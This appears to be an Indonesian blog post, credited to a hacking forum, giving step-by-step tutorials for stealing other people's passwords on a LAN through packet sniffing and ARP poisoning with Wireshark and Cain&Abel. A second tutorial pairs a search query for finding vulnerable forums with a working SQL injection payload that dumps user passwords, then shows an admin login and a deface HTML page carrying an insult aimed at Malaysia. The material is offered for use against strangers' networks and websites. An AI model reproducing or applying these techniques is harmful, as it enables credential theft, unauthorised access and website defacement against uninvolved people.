Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)
Pertama-tama sorry kalo repost karena
teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini
belum basi karena sampai saat ini masih dapat digunakan karena sebagian
besar jaringan meggunakan jaringan hub & switch yang tidak
terenkripsi.
Mengapa tidak terenkripsi?
* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet
yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi
Perbedaan antara jaringan Hub dan Switch:
* Pada jaringan hub semua data yang
mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang
ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo
tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data
yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest
data tersebut.
Masalahnya adalah harga dari router hub
dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah
menggunakan metode switch yang menyulitkan untuk network hacking.
Hacking ini menggunakan teknik:
* Sniffing
* ARP Poison Routing
Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.
Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda
Kelebihan:
* Tidak akan terdeteksi oleh firewall
tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan
bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free
Kekurangan:
* Untuk jaringan Switch harus di ARP
poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal
itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya
Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:
* Komputer Korban
* Komputer Hacker
* Server
Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:
1. Cek tipe jaringan anda, anda ada di
jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah
karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html
Cara Menggunakan WireShark:
* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju
ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets
in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan
(atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis
lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya
tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya
Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah
hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila
pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat
dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti
sebaliknya.
Cara Menggunakan Cain&Abel:
* Penggunaan program ini jauh lebih
mudah dan simple daripada menggunakan wireshark, tetapi bila anda
menginginkan semua packet yang sudah keluar dan masuk disarankan anda
menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan
password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password
Friendster anda harus menambahkan di username fields dan passworsd
fields kata name, untuk yang lain anda bisa mencarinya dengan menekan
klik kanan view source dan anda harus mencari variabel input dari login
dan password website tersebut. Yang sudah ada di defaultnya rasanyan
sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari
tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu
tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari
tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2
tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui
password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah
bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi)
“Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan
lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan
Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh
lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian
atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di
jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk
mengetahui alamat gateway server klik start pada komp anda pilih run
ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.
Anda dapat menjalankan kedua program di
atas secara bersamaan (Cain untuk APR dan wireshark untuk packet
sniffing) bila ingin hasil yang lebih maksimal.
Password yang bisa anda curi adalah
password yang ada di server HTTP (server yang tidak terenkripsi), bila
data tersebut ada di server yang terenkripsi maka anda harus mendekripsi
data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan
langkah2 yang jauh lebih panjang dari cara hack ini)
Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).
Ok langsung saja!
Ketik di google
inurl:/forums.asp?iFor=
trus enter
Pilih target…
Contoh link dari target
http://www.contoh.net/forum/forums.asp?iFor=23
Hapus angka yang ada dibelakang =
Hingga menjadi begini
http://www.contoh.net/forum/forums.asp?iFor=
Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Hingga menjadi seperti ini
http://www.contoh.net/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya
Cari username admin & passwrdnya.
Ok.. sebagai contoh disini saya menemukan username & password
Username : admin
Password : default
Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan “POST NEW TOPICS”
Isi Subject nya…
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.
Hmm……
Jika ingin menutup full seluruh halaman, pake code berikut
<DIV align=center><DIV
id=Layer1 style=”BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px;
Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: white 1px; WIDTH: 1300px;
BORDER-BOTTOM: white 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px;
BACKGROUND-COLOR: white; layer-background-color:
white”><center>
<br><b><font
face=”papyrus” color=”red” size=”5″>Attacked by :
Ichito-Bandito</font></h2><br><br><img
src=”http://forum.hackers-center.org/styles/melankolia/theme/images/site_logo.jpg”
><br><br>
<font face=”papyrus” color=”red” size=”5″>FUCK Malaysial and ASSOCIATE</a><br><br>
<font face=”papyrus” color=”red”
size=”5″>We Are Ready to Cybernetic
Wars</font><br><br><font color=”red”
size=”3″>Hackers-center In Here
</DIV>
Jangan Lupa Di edit dulu kodenya hehehe! Selamat Mencoba
And Jagan lupa Sahabat Juga tinggalkan Komentar hehehe
Source : http://forum.hackers-center.org
Tidak ada komentar:
Posting Komentar